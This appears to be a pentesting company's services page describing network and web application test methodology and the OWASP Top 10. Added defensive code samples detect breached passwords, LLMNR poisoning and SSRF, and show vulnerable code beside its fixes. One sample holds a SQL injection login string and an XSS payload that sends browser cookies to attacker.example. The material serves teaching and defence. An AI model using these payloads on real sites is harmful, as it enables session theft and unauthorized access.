Pentesting Services

Small and medium-sized companies often do not have sufficient internal resources to adequately protect their data and tools from unwanted access. This is where the specialists from Koller Engineering come in. Our approach is clearly structured and transparent: we uncover possible weak points and make recommendations for action so that you can sleep peacefully again. Ask for a non-binding offer via our contact page.


Our toolbox includes proven and new methods. A comprehensive picture of the situation shows where minimum standards and norms are adhered to and where action is needed. We also accompany our customers over longer periods of time and carry out regular scans and audits.

External Network Penetration Test

Setting up a strong perimeter

One of the most common forms of penetration testing, especially for SMEs, is an external network pentest. In this form of pentest, all systems on the edge of a company's network are checked, i.e. all systems that are publicly reachable from the Internet. Because these systems are reachable by everyone, they are a company's most exposed and most frequently attacked systems: they are scanned and probed almost daily. Most of these attacks are automated and look for simple vulnerabilities, but that should not distract from the fact that even a small vulnerability can have a significant impact.

The difference between an internal network penetration test and an external network penetration test is that an external network pentest assesses a company’s security posture from the perspective of a stranger who could be sitting thousands of miles away from the target. This perspective helps an organization understand how effective its external security posture is while identifying misconfigured controls or vulnerabilities that could be exploited from anywhere in the world.

What does an external network test check?

  • Misconfigured firewall rules
  • Open ports
  • Ineffective IDS
  • Weak password policies
  • Unpatched Systems
  • Shared cloud resources

External Network Test Methodology

The importance of a structured and consistent methodology in external network penetration testing should not be underestimated. While each project differs in scope, objectives, and tools needed, a consistent methodology ensures thorough coverage of each attack surface. Our team uses a structured process that ensures the quality of work at each audit.

Step 1: Collect information and enumerate

The first step we take in evaluating a company's external network is to collect and enumerate information about the target; this is also known as the reconnaissance phase. This step is critical because it creates a solid foundation of information that is later used to identify vulnerabilities and attack vectors. In penetration testing, there are two forms of reconnaissance:

  • Passive reconnaissance is the process of gathering information without ever interacting directly with the target environment. Good examples of passive reconnaissance are reviewing databases of breached credentials or reviewing job postings to find out what types of tools are used in the company.
  • Active reconnaissance is the process of probing the target environment directly. Our auditors use a number of different IP-range and host scanning tools to gather information about the exposed hosts, their services, and the software and firmware versions they run.

Step 2: Modeling the threat

Threat modeling is an essential but often overlooked step for a high-quality pentest. In this phase, auditors use the previously learned information to capture the network architecture, operating systems, open ports, and underlying services. Another important part of threat modeling is categorizing the different types of data that can be obtained during a pentest in a way that indicates the severity of the different outcomes. Threat modeling helps pentesters understand more than just the technical aspects of outcomes and allows them to formulate their findings in a way that aligns with the business.

Step 3: Vulnerability analysis

As soon as auditors enter the vulnerability assessment phase, they begin using tools to identify potential vulnerabilities in the environment. Automated tools help identify easy-to-discover vulnerabilities before our team moves on to where we spend most of our time: manual analysis and exploitation. We are often asked what kind of automated tools we use for scanning. The answer varies by scope, but we regularly rely on a few commercial and open-source tools we have integrated into our workflow, such as Burp Suite Pro, Metasploit, and Nessus.

Step 4: Exploitation

In this phase of the penetration test, we safely exploit the identified vulnerabilities and misconfigurations to determine what impact the various outcomes could have on the business. Our team tries to gain access to the exposed devices and systems and, from there, to penetrate the internal network. In the exploitation phase, auditors gain a better understanding of how the various vulnerabilities affect the business and help the customer prioritize remediation. This plays an important role in creating a report that gives the client actionable next steps. Below are some examples of vulnerabilities that we try to exploit in an external network pentest.

  • Compromising external remote-access services: With the rise of remote work, more and more companies rely on services that allow employees to reach internal corporate resources from remote locations (VPN gateways, remote desktop portals, and similar). Our auditors try to gain access to these remote-access gateways to establish a foothold in the environment.
  • Exploiting public-facing applications: Applications, databases, and the administration and management interfaces of network devices are often exposed to the Internet and could be exploited by malicious actors. We evaluate these systems and portals.
  • Default and employee accounts: Software, operating systems, and devices ship with default accounts that may still be in use. Attackers will try to misuse such credentials to gain access to an environment. In addition, employees may reuse credentials that have already been compromised in other breaches (e.g., a personal email/password combination), so our team uses a proprietary database of breached credentials to investigate this type of attack path.
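To show the mechanics of the breached-credential check in the last bullet, here is an added example (not Koller Engineering's tooling or database): a password is hashed locally and only the first five hex characters of the digest are sent to the lookup side, which returns every matching suffix, so the lookup side never learns the password. This is the hash-prefix (k-anonymity) scheme used by Have I Been Pwned's Pwned Passwords range API. The breach corpus, the sample accounts, and all function names are constructed for this example.

```python
"""Breached-password check using hash-prefix (k-anonymity) lookups, as used by
Have I Been Pwned's Pwned Passwords range API. Added example; the corpus below
is constructed for this page and the function names are the example's own."""
import hashlib

# Constructed corpus: SHA-1 digests of passwords seen in public breach dumps,
# mapped to how often each was seen. A real check would use a full breach
# dataset or the range API over HTTPS.
_SAMPLE_PASSWORDS = {"Password1": 12345, "Summer2023!": 87, "letmein": 40000}
BREACH_CORPUS = {
    hashlib.sha1(p.encode("utf-8")).hexdigest().upper(): seen
    for p, seen in _SAMPLE_PASSWORDS.items()
}


def range_lookup(prefix: str) -> dict:
    """Lookup side: return every digest suffix that shares the 5-hex-char prefix.
    It only ever sees the prefix, so it cannot tell which password the client
    is checking."""
    prefix = prefix.upper()
    if len(prefix) != 5 or any(c not in "0123456789ABCDEF" for c in prefix):
        raise ValueError("prefix must be exactly 5 hex characters")
    return {h[5:]: seen for h, seen in BREACH_CORPUS.items() if h.startswith(prefix)}


def breached_count(password: str, lookup=range_lookup) -> int:
    """Client side: hash locally, send only the prefix, match the suffix locally.
    Returns how many times the password appeared in breaches (0 = not found)."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    return lookup(prefix).get(suffix, 0)


def audit_accounts(accounts: dict) -> list:
    """Return [(username, seen_count), ...] for accounts using a breached password,
    sorted by username. `accounts` maps usernames to candidate passwords, e.g.
    cleartext recovered during a test or a tester's own guesses."""
    hits = [(user, breached_count(pw)) for user, pw in accounts.items()]
    return sorted((u, n) for u, n in hits if n)


if __name__ == "__main__":
    # Constructed sample accounts for the demonstration.
    sample = {"j.smith": "Password1",
              "m.mueller": "correct horse battery staple",
              "svc-backup": "letmein"}
    for user, seen in audit_accounts(sample):
        print(f"{user}: password seen {seen} times in breach data")
```

The same client-side function works unchanged against a real range service: swap `range_lookup` for a function that fetches the prefix over HTTPS and parses the returned `SUFFIX:COUNT` lines. Never send the full digest, and never send the password itself.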

Step 5: Documentation and reporting

At the end of each penetration test, customers receive a report that documents the results and includes actionable steps to improve the security of their network environment. At this stage, we summarize all the results of the pentest and compile them into a report. What you get with the report is described below:

  • Summary and strategic recommendations
  • Strengths and weaknesses
  • Technical documentation: test procedures & screenshots
  • Actionable Steps to Remediate
  • Summary document (disclosure to third parties without revealing highly sensitive information)

It's important to highlight the value of a good pentest report: it helps with strategic decisions and budgets, it can be provided to auditors as evidence of compliance with rules and regulations, and it can be made available to enterprise customers who require annual pentests from their suppliers.

Step 6: Tests to fix the deficiencies and update the reports

After the customer has implemented the remediation steps described in the report, our testers conduct a remediation test to ensure not only that all previously identified vulnerabilities have been eliminated, but also that no new vulnerabilities have been introduced during the remediation process. We then update the report and prepare a summary document that reflects the resolved state.

Internal Network Penetration Test

Thorough defense

Internal network tests are an evaluation of all systems in the internal corporate network. An internal network test looks at what would happen if an attacker gained a foothold inside the network; this could happen by exploiting the external network, by using an employee's credentials, or through a malicious action by an employee. Traditionally, companies have assumed they are safe if they have a hardened perimeter, but time has shown that much more than that is needed. An egg is a common analogy for a poorly secured network: you don't want a hard exterior (the eggshell) and then a soft interior with little to no security.

What is checked during an internal network test?

  • Insufficient network segmentation
  • Open ports
  • Insufficient controls for user management
  • Unpatched Systems
  • Weak password policies
  • Use of insecure protocols

Internal network pentest methodology

The importance of a structured and consistent methodology in internal network penetration testing cannot be overstated. While each project differs in scope, objectives, and tools needed, a consistent methodology ensures thorough coverage of each attack surface. Our team uses a structured process that ensures the quality of work at each audit.

Step 1: Collect information and enumerate

The first step our auditors take in evaluating a company's internal network is to collect and enumerate information about the target; this is also known as the reconnaissance phase. This step is critical because it creates a solid foundation of information that is later used to identify vulnerabilities and attack vectors. In penetration testing, there are two forms of reconnaissance:

  • Passive reconnaissance is the process of gathering information without ever interacting directly with the target environment. Good examples of passive reconnaissance are reviewing databases of breached credentials or reviewing job postings to find out what types of tools are used in the company.
  • Active reconnaissance is the process of probing the target environment directly. Our auditors use a number of different IP-range and host scanning tools to gather information about hosts, their services, and the software and firmware versions they run.

Step 2: Modeling the threat

Threat modeling is an important but often overlooked step for a high-quality pentest. In this phase, auditors use the previously learned information to capture the network architecture, operating systems, open ports, and underlying services. Another important part of threat modeling is categorizing the different types of data that can be obtained during a pentest in a way that indicates the severity of the different outcomes. Threat modeling helps pentesters understand more than just the technical aspects of outcomes and allows them to formulate their findings in a way that aligns with the business.

Step 3: Vulnerability analysis

As soon as auditors enter the vulnerability assessment phase, they begin using tools to identify potential vulnerabilities in the environment. Automated tools help identify easy-to-discover vulnerabilities before our team moves on to where we spend most of our time: manual analysis and exploitation. We are often asked what kind of automated tools we use for scanning. While the answer varies by scope, we regularly rely on a few commercial and open-source tools we have integrated into our workflow, such as Burp Suite Pro, Metasploit, and Nessus.

Step 4: Exploitation

In this phase of the penetration test, we safely exploit the identified vulnerabilities and misconfigurations to determine what impact the various outcomes could have on the business. Our team tries to gain access to devices and systems and to extend that access across the internal network. In the exploitation phase, auditors gain a better understanding of how the various vulnerabilities can affect the business and help the client prioritize remediation. This plays an important role in creating a report that gives the client actionable next steps. Below are some examples of vulnerabilities that our auditors attempt to exploit in an internal network test.

  • Man-in-the-middle attacks: Attackers who have gained a foothold on the internal network can perform so-called MITM attacks that abuse local name-resolution protocols such as LLMNR (and NBT-NS). When a workstation broadcasts a lookup for a name that DNS could not resolve, for example a mistyped share name, the attacker answers with their own address, poses as the requested server, and captures the authentication material (such as NTLM challenge-response hashes) the victim then sends to them.
  • Lateral movement: The reason lateral movement can have such a big impact is that when an attacker first gains access to the internal network, the likelihood that they already hold the right access to the most important data is low. An attacker will abuse protocols such as RDP or SMB to move sideways and extend their access. Successful lateral movement can cause serious damage if the internal network is not properly hardened and segmented; conversely, preventing lateral movement plays a big role in thwarting ransomware campaigns.
  • Common and critical vulnerabilities: If an environment is not patched consistently, attackers can exploit well-known CVEs such as EternalBlue (CVE-2017-0144), which is remotely exploitable over SMB, or the CPU side-channel flaws Spectre (CVE-2017-5753 & CVE-2017-5715) and Meltdown (CVE-2017-5754), which require code execution on the affected host and therefore matter once an attacker already has a foothold.
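As an added example for the LLMNR poisoning described in the first bullet (this is not Koller Engineering's tooling), the following Python code parses LLMNR messages from UDP port 5355 and applies two detections a defender can run on captured traffic: any host that answers a canary name that exists nowhere on the network is lying, and a host that answers for many different names is behaving like a poisoner rather than like a server answering for itself. The packets, hosts, and names are constructed for the example; a real deployment would feed it payloads from a packet capture.

```python
"""Parse LLMNR (RFC 4795) messages and flag hosts behaving like a poisoner.
Added example, not Koller Engineering's tooling; the packets and hosts below
are constructed. Feed it (source_ip, udp_payload) pairs captured on UDP/5355."""
import struct

LLMNR_PORT = 5355          # LLMNR is sent to multicast 224.0.0.252 / ff02::1:3
FLAG_RESPONSE = 0x8000     # QR bit in the DNS-style header


def _encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def _decode_name(data: bytes, off: int):
    labels = []
    while True:
        length = data[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:                      # compression pointer
            ptr = struct.unpack_from("!H", data, off)[0] & 0x3FFF
            tail, _ = _decode_name(data, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        off += 1
        labels.append(data[off:off + length].decode("ascii"))
        off += length


def build_query(tid: int, name: str) -> bytes:
    """Client asks 'who is <name>?' (A record). Used to build the sample traffic."""
    return struct.pack("!HHHHHH", tid, 0, 1, 0, 0, 0) + _encode_name(name) + struct.pack("!HH", 1, 1)


def build_response(tid: int, name: str, ip: str) -> bytes:
    """Responder answers with an A record. A poisoner answers with its own IP."""
    header = struct.pack("!HHHHHH", tid, FLAG_RESPONSE, 1, 1, 0, 0)
    question = _encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = _encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + rdata
    return header + question + answer


def parse_llmnr(data: bytes) -> dict:
    tid, flags, qdcount, ancount, _, _ = struct.unpack_from("!HHHHHH", data, 0)
    off, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, off = _decode_name(data, off)
        off += 4                                       # QTYPE + QCLASS
        questions.append(name)
    for _ in range(ancount):
        name, off = _decode_name(data, off)
        rtype, _, _, rdlen = struct.unpack_from("!HHIH", data, off)
        off += 10
        rdata, off = data[off:off + rdlen], off + rdlen
        if rtype == 1 and rdlen == 4:                  # A record
            answers.append((name, ".".join(str(b) for b in rdata)))
    return {"id": tid, "is_response": bool(flags & FLAG_RESPONSE),
            "questions": questions, "answers": answers}


def detect_poisoner(packets, canary_names, max_names: int = 2) -> dict:
    """Two signals: (1) anyone answering a canary name that exists nowhere is lying;
    (2) a legitimate host answers only for its own name(s), a poisoner answers all."""
    canaries = {n.lower() for n in canary_names}
    names_by_host, findings = {}, {}
    for src, payload in packets:
        msg = parse_llmnr(payload)
        if not msg["is_response"]:
            continue
        for name, _ip in msg["answers"]:
            names_by_host.setdefault(src, set()).add(name.lower())
            if name.lower() in canaries:
                findings.setdefault(src, set()).add("answered canary name " + name)
    for src, names in names_by_host.items():
        if len(names) > max_names:
            findings.setdefault(src, set()).add("answered %d different names" % len(names))
    return {src: sorted(reasons) for src, reasons in findings.items()}


def sample_traffic():
    """Constructed capture: a real file server answers for itself, a workstation
    mistypes a share name, and a poisoner at 10.0.0.66 answers everything."""
    return [
        ("10.0.0.31", build_query(1, "FILESRV01")),
        ("10.0.0.20", build_response(1, "FILESRV01", "10.0.0.20")),
        ("10.0.0.31", build_query(2, "FILESRV0l")),              # typo: no such host
        ("10.0.0.66", build_response(2, "FILESRV0l", "10.0.0.66")),
        ("10.0.0.31", build_query(3, "wpad")),
        ("10.0.0.66", build_response(3, "wpad", "10.0.0.66")),
        ("10.0.0.40", build_query(4, "canary-does-not-exist")),  # SOC-sent canary
        ("10.0.0.66", build_response(4, "canary-does-not-exist", "10.0.0.66")),
    ]


def sample_findings() -> dict:
    return detect_poisoner(sample_traffic(), ["canary-does-not-exist"])
```

The canary signal is the more reliable of the two, since a legitimate host has no reason to answer for a name that was never assigned. The real fix is to disable LLMNR and NBT-NS via Group Policy and to require SMB signing, so that captured authentication exchanges cannot be relayed.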

Step 5: Documentation and reporting

At the end of each penetration test, customers receive a report that documents the results and includes actionable steps to improve the security of their network environment. In this phase, we summarize all the results of the pentest and compile them in a report for our customers. What you get with the report is described below:

  • Summary and strategic recommendations
  • Strengths and weaknesses
  • Technical documentation: test procedures & screenshots
  • Actionable Steps to Remediate
  • Summary document (disclosure to third parties without revealing highly sensitive information)

It’s important to highlight the value of a good pentest report – it helps with strategic decisions and budgets, it is provided to auditors for compliance with rules and regulations, and it can be made available to enterprise customers who require annual pentests from their third-party service providers. 

Step 6: Tests to fix the deficiencies and update the reports

After a client has followed the remediation steps described in the report, our auditors conduct a remediation test to ensure that not only have all previously identified vulnerabilities been eliminated, but also that no new vulnerabilities have emerged during the remediation process. We will also issue an updated report and summary document reflecting the resolved condition.

Application penetration testing

Expansion of web apps, mobile applications and APIs

Applications and the way we interact with them have evolved over the years and are more than just static brochures hosted online. Applications have become increasingly complex due to their reliance on user input, third-party libraries, APIs, containers, and more.

Applications have changed both the enterprise and consumer landscapes. Entire companies sell complex applications that solve everyday business problems, while the average consumer entrusts the applications with some of their most sensitive data: photo IDs, credit card numbers, and social security numbers.

The importance of applications keeps growing over time, and with it the attention they attract from cybercriminals.

Application Pentests – OWASP Top 10

Our application assessment team consists of members who have a deep understanding of applications as well as of the tactics, techniques, and procedures commonly used by today's cybercriminals. Experienced software developers have adopted the so-called OWASP Top 10, which serves as a guide to the most common categories of application security vulnerabilities. While the OWASP Top 10 provides a good starting point, it does not cover advanced vulnerabilities or flaws in business logic. Vulnerability scanners and less experienced pentesters that rely solely on the OWASP Top 10 may miss more subtle and serious findings that can be exploited. Still, software developers who build in checks for the OWASP Top 10 are one step ahead of those who don't. Below is an overview of the OWASP Top 10 for 2021.

1. Broken access control

When access controls are configured correctly, an application enforces policies to ensure that users cannot act outside their assigned permissions. In other words, the application allows some users to access certain content and features, while denying others that access. Defective access controls can lead to inadvertent disclosure of information, destruction or alteration of data, and unintended functions that may be abused by a user.

2. Cryptographic failures

Cryptographic failures occur when sensitive data is not adequately protected at rest or in transit. This is about ensuring that your most important data is encrypted where needed, that the algorithms and protocols used are current, and that the keys are properly managed.

3. Injection

The various forms of injection, which ranked No. 1 in the 2010, 2013, and 2017 editions of the list, occur when attacker-controlled input is passed to an interpreter (a SQL engine, an OS shell, an LDAP server, and so on) as part of a command or query. This can allow attackers to do whatever they want with the contents of your database, compromise back-end systems, or attack other users.

4. Insecure design

The “Unsafe Design” category, which was added in 2021, is rather vague, but shifts the focus to design and architectural flaws that should be detected earlier in the development process. OWASP adopts the shift-left mentality and calls for more threat modeling, secure design patterns, and reference architectures.

5. Security misconfiguration

Security misconfigurations refer to improper server or application configurations that lead to a number of vulnerabilities. This can include incorrect permissions to exposed directories or management consoles, the use of default credentials, or misconfigured cloud environments.

6. Vulnerable and outdated components

When creating an application, vulnerable and obsolete components can be used. Examples include using unpatched servers or vulnerable third-party libraries.

7. Identification and authentication failures

If a user's identity, authentication, and session details are not handled properly, vulnerabilities arise that can be exploited. Authentication means proving that you are who you claim to be. Attacks that target passwords, keys, or session tokens and allow an attacker to impersonate a user therefore fall into this category.

8. Software and data integrity failures

This category, newly introduced in 2021, refers to code and infrastructure that do not protect against integrity violations. An example of this would be an automatic software update that is installed without checking the security of the new code.

9. Security logging and monitoring failures

This category includes issues related to detection, escalation, and response to active incidents. Insufficient logging, detection, and monitoring can prevent security incidents from being detected and mitigated.

10. Server-side request forgery (SSRF)

SSRF attacks occur when a malicious actor misuses functions of the server to read or update internal resources. These attacks can allow access to servers that should not be accessible over the Internet.
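As an added example for the SSRF category (not code from the original page), the following check vets a user-supplied URL before the server fetches it: it allows only http/https, rejects URLs carrying userinfo (the `http://trusted@internal/` trick), resolves the host, and rejects any address that is private, loopback, link-local (which covers the cloud metadata address 169.254.169.254), multicast, or reserved. The resolver is a constructed mapping so the example runs offline; a real deployment would resolve with `socket.getaddrinfo`, and the caller must connect to the returned addresses directly rather than re-resolving the name, otherwise a DNS rebinding attack can swap in an internal address between check and use.

```python
"""Allow-list check for a user-supplied URL before the server fetches it. Added
example, not the page's code; the resolver mapping is constructed so it runs
offline (a real deployment resolves with socket.getaddrinfo)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(addr: str) -> bool:
    """Reject anything that is not a globally routable unicast address:
    RFC 1918, loopback, link-local (incl. cloud metadata 169.254.169.254),
    multicast, reserved and unspecified ranges, for both IPv4 and IPv6."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url: str, resolve) -> tuple:
    """Return (ok, detail). On success `detail` is the list of vetted IPs the
    caller must connect to directly; re-resolving the hostname at connect time
    reopens the door to DNS rebinding."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL not allowed"      # http://trusted@internal/
    try:                                                  # literal IP (v4, or v6 in [])
        addresses = [str(ipaddress.ip_address(parts.hostname))]
    except ValueError:
        addresses = resolve(parts.hostname)
    if not addresses:
        return False, "could not resolve %r" % parts.hostname
    for addr in addresses:
        if not is_public_address(addr):
            return False, "%s resolves to non-public address %s" % (parts.hostname, addr)
    return True, addresses


# Constructed resolver standing in for DNS in this example.
FAKE_DNS = {
    "www.example.com": ["93.184.216.34"],
    "intranet.example": ["10.0.0.5"],
    "metadata.example": ["169.254.169.254"],
    "localhost": ["127.0.0.1", "::1"],
}


def check(url: str) -> tuple:
    return validate_outbound_url(url, lambda host: FAKE_DNS.get(host.lower(), []))


if __name__ == "__main__":
    for u in ["https://www.example.com/report.pdf",
              "http://intranet.example/admin",
              "http://169.254.169.254/latest/meta-data/",
              "http://[::1]:8080/",
              "file:///etc/passwd",
              "http://www.example.com@metadata.example/"]:
        print(u, "->", check(u))
```

Two caveats a practitioner should keep in mind: HTTP redirects must be re-validated hop by hop, because an allowed public host can redirect the fetcher to an internal address, and an allow-list of specific destination hosts is stronger than this deny-list of address ranges whenever the business case permits it.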

Pentest methodology for web applications

The importance of a structured and consistent methodology for penetration testing of web applications cannot be overstated. While each project differs in scope, objectives, and tools required, a consistent methodology ensures thorough coverage of each attack surface. Our team uses a structured process to ensure that quality work is done on every audit.

Step 1: Collect information and enumerate

The first step our auditors take when pentesting web applications is to collect and enumerate information about the target; this is also commonly referred to as the reconnaissance phase. This step is critical because it creates a solid foundation of information that is later used to identify vulnerabilities and attack vectors. In penetration testing, there are two forms of reconnaissance:

  • Passive reconnaissance is the process of gathering information without ever interacting directly with the target application. Good examples of passive reconnaissance include using search-engine queries to enumerate interesting subdomains or checking GitHub repositories for
  • Active reconnaissance is the process of probing the target application directly. Examples of active reconnaissance include fingerprinting the application, generating and analyzing error responses, and scanning for open ports.

Step 2: Threat Modeling

Threat modeling is an essential but often overlooked step for a high-quality pentest. At this stage, auditors use previously learned information to identify sensitive data, areas of interest, and business logic to be further investigated. Another important part of threat modeling is categorizing different types of data that can be obtained during a pentest in a way that indicates the severity of the different outcomes. Threat modeling helps pentesters understand more than just the technical aspects of outcomes and allows them to formulate their findings in a way that aligns with the business.

Step 3: Vulnerability analysis

Once auditors enter the vulnerability assessment phase, they use tools to systematically identify vulnerabilities in the application. Automated tools help identify low-hanging vulnerabilities before our team moves on to where we spend most of our time: manual analysis and exploitation. We are often asked what kind of automated tools we use for scanning. While the answer varies by scope, we regularly rely on a few commercial and open-source tools we have integrated into our workflow, such as Burp Suite Pro, Metasploit, and Nessus.

Step 4: Exploitation

At this stage of the penetration test, we safely exploit the identified vulnerabilities and misconfigurations to determine what impact the various outcomes would have on the business. The exploitation phase allows auditors to better understand how the various vulnerabilities would affect the business and ultimately helps the client prioritize their remedial actions. Below are some of the issues our auditors try to exploit in a web application pentest.

  • Cross-site scripting (XSS): An attacker injects script into a page so that it executes in an unsuspecting user's browser. This can allow the attacker to act as the victim inside the application, steal session tokens or credentials, or redirect the victim from the legitimate website to a malicious one.
  • SQL injection: Attackers alter the queries the application sends to its database. This can allow someone to read sensitive data from the database, modify it, or even delete it.
  • Flaws in business logic: When design and development teams make false assumptions about how users can interact with the application, they create opportunities that an attacker can abuse. A common example is a workflow bypass: the application assumes that every user goes through a specific sequence of steps, but a malicious actor may be able to skip steps, which can lead to errors that reveal sensitive information or to actions being performed without the intended checks.
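The following added example (not code from the original page) puts the first two bullets side by side with their fixes: a login query built by string concatenation next to its parameterised form, and a comment rendered verbatim next to one passed through context-appropriate HTML encoding. The users table, the attacker inputs, and the function names are constructed for the example.

```python
"""Vulnerable versus hardened versions of the two web flaws above. Added example,
not code from the original page; the table and the sample inputs are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed users table. Cleartext passwords only to keep the query shape
    # visible; a real application stores salted password hashes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret!", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Query built by string concatenation: user input becomes part of the SQL.
    A username of  alice' --  turns the rest of the WHERE clause into a comment."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str) -> list:
    """Parameterised query: the driver passes values separately from the SQL text,
    so quotes and comment markers in the input are just data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def render_comment_unsafe(comment: str) -> str:
    """Reflects the comment into the page verbatim (stored/reflected XSS)."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Encodes for the HTML body context. Attribute, URL and JavaScript contexts
    need their own encoders; output encoding always follows the context."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# Constructed attacker inputs: the first comments out the password check,
# the second tries to exfiltrate the viewer's cookie.
SQLI_USERNAME = "alice' --"
XSS_COMMENT = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_USERNAME, "wrong-password"))
    print("safe login:      ", login_safe(db, SQLI_USERNAME, "wrong-password"))
    print(render_comment_unsafe(XSS_COMMENT))
    print(render_comment_safe(XSS_COMMENT))
```

The vulnerable login returns Alice's admin row without a valid password, while the parameterised one returns nothing for the same input. Note that parameterisation protects values only; table and column names taken from user input still need an allow-list.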

Step 5: Documentation and reporting

At the end of each penetration test, customers receive a report that documents the results and includes actionable steps to improve the security of their web application. In this phase, we summarize all the results of the pentest and compile them in a report. What you get with the report is described below:

  • Summary and strategic recommendations
  • Strengths and weaknesses
  • Technical documentation: test procedures & screenshots
  • Actionable Steps to Remediate
  • Summary document (disclosure to third parties without revealing highly sensitive information)

It’s important to highlight the value of a good pentest report –  it helps with strategic decisions and budgets, it is provided to auditors for compliance with rules and regulations, and it can be made available to enterprise customers who require annual pentests from their third-party service providers. 

Step 6: Tests to fix the deficiencies and update the reports

After a client has followed the remediation steps described in the report, our auditors conduct a remediation test to ensure that not only have all previously identified vulnerabilities been eliminated, but also that no new vulnerabilities have emerged during the remediation process. We will also issue an updated report and summary document reflecting the resolved condition.

Ransomware Readiness Assessment

We help our customers understand how to defend against a comprehensive list of ransomware strains. We review the controls and policies that can limit the impact of new ransomware strains. Our Ransomware Readiness Assessment is a proactive approach to the ransomware risk that all organizations worry about.

Actionable Pentest Report

Our reports document every step of the job in a clear and concise manner. The reports include a summary that translates highly technical findings into information for senior management. You will also notice that our reports contain detailed information on the technical findings, their reproducibility and the ways to fix them. Along with these insights, you will receive guidance on best practices to further strengthen your security posture.

Why should you work with us?

Experience.

We have a small team that focuses exclusively on penetration testing. Our experience comes from years of working at leading penetration testing companies with some of the largest customers around the world. Each team member has an offensive security background and years of experience conducting pentests.

Purpose.

Granted, companies with a mission or purpose are a cliché these days. Nevertheless, the increasing focus of cybercriminals on SMEs is a cause for concern. We believe that the lack of pentesting companies positioned for the SMB market is one of the main causes of this – if the SMB market does not know where its most critical vulnerabilities lie, how can it make the right investments to strengthen its security posture?

So that’s our goal. We want to help the SME market improve its security situation.
